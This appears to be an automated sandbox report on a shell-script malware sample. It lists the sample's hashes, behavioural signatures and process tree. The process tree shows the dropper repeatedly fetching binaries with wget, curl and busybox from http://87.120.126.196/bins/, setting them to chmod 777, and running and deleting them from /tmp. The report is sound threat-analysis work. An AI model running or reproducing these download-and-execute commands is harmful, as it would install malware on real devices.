Analysis
max time kernel: 74s
max time network: 75s
platform: debian-9_mipsel
resource: debian9-mipsel-20240729-en
resource tags: arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
submitted: 21/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
-
Size
10KB
-
MD5
f79898139a1b167722dc600e9d8751bd
-
SHA1
c722cddfe77235ab1217ff62e01181953ff08a24
-
SHA256
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e
-
SHA512
99640786d2cad89e6932b07b8415be47959e635c05d46f6a9296711a1ba314dac17263a2d108e0af8a7ac270981f81c2065ac6f5cf718e3e5b9cff0d96e70137
-
SSDEEP
192:w/fwLnbwfOiNa6QAP8AnDlksBw8S8AnkksBw8t/fwLnAOiNa6I:zwOAP8AnDlksBw8S8AnkksBw8q
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; process: curl
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:730
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:739
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:745
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:757
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:827
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:838
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:844
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:850
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:856
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:862
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:871
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:877
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:883
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:889
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:895
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:901
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:907
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:913
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:919
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:925
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:931
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:937
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:943
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:949
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:955
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:961
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:967
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:973
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97